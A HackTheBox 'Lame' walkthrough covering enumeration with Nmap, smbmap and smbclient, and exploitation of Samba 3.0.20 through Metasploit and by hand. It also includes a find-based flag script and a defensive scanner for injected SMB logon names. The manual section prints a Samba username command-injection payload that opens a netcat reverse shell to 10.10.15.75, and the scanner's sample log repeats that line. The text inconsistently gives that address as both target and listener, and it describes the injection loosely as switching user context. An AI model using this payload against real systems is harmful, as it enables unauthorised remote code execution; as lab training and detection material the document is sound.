Lame is a beginner-friendly box available on HackTheBox. In this walkthrough, I’ll go through Nmap, SMB file shares, anonymous FTP logins, Searchsploit, and Metasploit to tackle this machine.
Insights
- Vulnerability Scanning: Utilizing tools like Nmap to identify open ports and potential weaknesses in services on a target system.
- Exploitation Techniques: Employing both automated tools (e.g., Metasploit) and manual methods to leverage discovered vulnerabilities and gain deeper access.
- Privilege Escalation: Exploring and exploiting configurations, misconfigurations, or vulnerabilities to elevate privileges from a standard user to higher-level access, such as root.
User Flag
Beginning with an Nmap scan, I observed FTP allowing anonymous logins, an active SSH server, and an SMB file share.
Attempting to connect to the FTP server with anonymous login, I was directed to an empty directory, leading me to shift my focus elsewhere.
Given that there’s an SMB fileshare available, my next step was to enumerate the share using smbmap.
└─$ smbmap -H 10.129.213.17
tmp READ, WRITE oh noes!
Observing the results, I noticed a hint: there’s read/write access to a specific share, accompanied by an intriguing message. This prompted me to attempt a connection to the /tmp share using smbclient.
However, I encountered a snag: there seem to be compatibility issues between older SMB servers and the current smbclient. To address this, I edited the smb.conf file to append client min protocol=NT1 under the [global] section. With this modification, I proceeded to establish a connection.
└─$ smbclient -N //10.10.15.75/tmp --option='client min protocol=NT1'
From the data I gathered using the Nmap scan, I identified the versions of both the FTP and SSH services. With this information in hand, I turned to searchsploit to check if there were any documented vulnerabilities for these specific versions.
└─$ searchsploit vsftpd 2.3.4
-------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command | unix/remote/17491.rb
vsftpd 2.3.4 - Backdoor Command | unix/remote/49757.py
-------------------------------- ---------------------------------
Shellcodes: No Results
The Ruby script in the results indicated that a Metasploit module for this exploit probably already exists.
I proceeded to launch msfconsole and initiated a search for the relevant exploit to confirm its availability.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Unfortunately, the exploit didn’t produce the desired results. It appears that the box has been patched or has some defensive measures in place against this specific vulnerability.
Given this outcome, I shifted my focus to another potential target: the SMB service.
Exploit
└─$ searchsploit samba 3.0.20
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflo | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflo | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Serv | linux_x86/dos/36741.py
------------------------------------- ---------------------------------
Shellcodes: No Results
Upon noticing another Ruby script, I opted to search for it within Metasploit, hoping to utilize a pre-made module to ease the exploitation process.
Once the module is loaded in Metasploit, it’s vital to configure the necessary parameters. Specifically, the RHOSTS should be set to the IP address of the target machine. For the LHOST, typically, the assigned IP over the HTB VPN is used. A quick way to fetch this IP is by referring to the tun0 interface, provided that’s the only active VPN connection at the moment.
Find Command
The find command is a versatile tool in the UNIX and Linux arsenal. It enables users to traverse a directory structure and locate files based on various criteria, be it name, age, permissions, or even more intricate parameters.
One of the command’s most powerful features is its ability to pair the search operation with subsequent actions via the -exec flag. This allows operations to be performed on the files or directories that match the search criteria, all in one command.
Leveraging the access the discovered exploit provided, which was root in this case, I utilized the find command to efficiently locate both of the flags without the need to manually trawl through the filesystem.
find / -type f -name "user.txt" 2>/dev/null [user flag]
Root Flag
find / -type f -name "root.txt" 2>/dev/null [root flag]
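As an added example (not part of the walkthrough), the same flag search written with the -exec feature described above; it builds a small constructed directory tree so it runs anywhere, and the flag file names are the box's own:

```shell
#!/bin/sh
# Added example: the flag search from the walkthrough, written with find's -exec
# so each hit is acted on in the same command. The directory tree is constructed
# here so the script runs anywhere; the flag file names are the box's own.

# Print "path: contents" for every flag file under $1. Errors from unreadable
# directories go to /dev/null via 2> (note the direction: 2< would open
# /dev/null read-only on fd 2, which is not a redirection of error output).
locate_flags() {
    find "$1" -type f \( -name user.txt -o -name root.txt \) \
        -exec sh -c 'printf "%s: " "$1"; cat "$1"' _ {} \; 2>/dev/null
}

# Same search, but -exec ... {} + hands all hits to one process at once,
# which is cheaper than one process per file when there are many matches.
count_flags() {
    find "$1" -type f \( -name user.txt -o -name root.txt \) \
        -exec printf '%s\n' {} + 2>/dev/null | wc -l
}

# Constructed sample tree: a low-privileged user's home, root's home, and a decoy.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/home/lowpriv" "$dir/root" "$dir/etc"
    printf 'USERFLAG\n' > "$dir/home/lowpriv/user.txt"
    printf 'ROOTFLAG\n' > "$dir/root/root.txt"
    printf 'not a flag\n' > "$dir/etc/root.txt.bak"
    printf '%s\n' "$dir"
}

TREE=$(make_sample_tree)
locate_flags "$TREE"          # prints both flags with their paths
count_flags "$TREE"           # prints 2
rm -rf "$TREE"
```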
Without Metasploit
Given that this box is designed in the vein of OSCP, it’s pertinent to detail a manual exploitation approach as well. Such a methodology not only provides a deeper understanding of the underlying vulnerabilities but also fine-tunes one’s skills for scenarios where automation tools might not be available or suitable.
Given that we have access to the shared drive over SMB, one avenue for manual exploitation is manipulating the user context. The logon command in smbclient offers an opportunity here, allowing users to switch their context to another user, provided they possess the requisite credentials or have identified a misconfiguration. Exploring this vector could potentially open new avenues for deeper access or further information disclosure.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.15.75 31337`"
Ensure you configure a netcat listener in anticipation of the incoming connection. Proper setup is crucial for this step to succeed.
And just like that, we’ve successfully rooted another box, this time without leaning on Metasploit! It’s always rewarding to accomplish tasks using manual techniques, as it provides a deeper understanding of the underlying processes.
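From the defender's side, an added example (not from the walkthrough) that scans SMB session-setup records for usernames containing shell metacharacters, the signature of the injected logon shown above; the record format and the 10.10.14.3 address are constructed for this example and are not Samba's own log output:

```shell
#!/bin/sh
# Added example: flag SMB logon usernames carrying shell metacharacters, the
# pattern of the injected logon in the walkthrough. The record format below is
# constructed for this example (not Samba's own log format); adapt the
# user="..." and client=... extraction to whatever your SMB server emits.

# Constructed sample records: a benign guest logon, the injected username, a normal user.
SAMPLE_LOG='2024-01-01T10:00:00 smbd session-setup client=10.10.15.75 user="guest" share="tmp"
2024-01-01T10:00:05 smbd session-setup client=10.10.15.75 user="./=`nohup nc -e /bin/sh 10.10.15.75 31337`" share="tmp"
2024-01-01T10:00:09 smbd session-setup client=10.10.14.3 user="alice" share="home"'

# A username should never contain a backtick, $, ;, |, &, or a redirect;
# any of these inside the quoted user field marks the record as injection.
INJECT_RE='user="[^"]*[`$;|&<>][^"]*"'

# Print the offending records (exit status follows grep: 0 if any matched).
find_injected_logons() {
    printf '%s\n' "$1" | grep -E "$INJECT_RE"
}

# Number of offending records, for alert thresholds.
count_injected_logons() {
    printf '%s\n' "$1" | grep -Ec "$INJECT_RE"
}

# Distinct client addresses behind the offending records, for correlation or blocking.
injected_logon_sources() {
    find_injected_logons "$1" | sed -n 's/.*client=\([0-9.]*\).*/\1/p' | sort -u
}

if [ "$(count_injected_logons "$SAMPLE_LOG")" -gt 0 ]; then
    echo "suspicious SMB logons:"
    find_injected_logons "$SAMPLE_LOG"
    echo "sources:"
    injected_logon_sources "$SAMPLE_LOG"
fi
```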
Summary
While working on the “Lame” box on HackTheBox, I began with an Nmap scan which revealed an FTP server, SSH server, and an SMB file share. The FTP server didn’t provide much, but the SMB file share caught my attention. I encountered a compatibility issue with the old SMB server, but after some research, I managed to resolve it. Using details from the Nmap scan, I tried to identify vulnerabilities in the FTP and SMB services. My initial attempt using a Metasploit exploit for the FTP wasn’t successful, but I eventually found a working exploit for the SMB service. With the UNIX find command, I located both user and root flags. Wanting to understand the process better, I also tried a manual exploitation of the box without Metasploit. By manipulating SMB user contexts and setting up a netcat listener, I managed to gain deeper access. Through this process, I learned a lot and appreciated the nuances of both automated and hands-on techniques.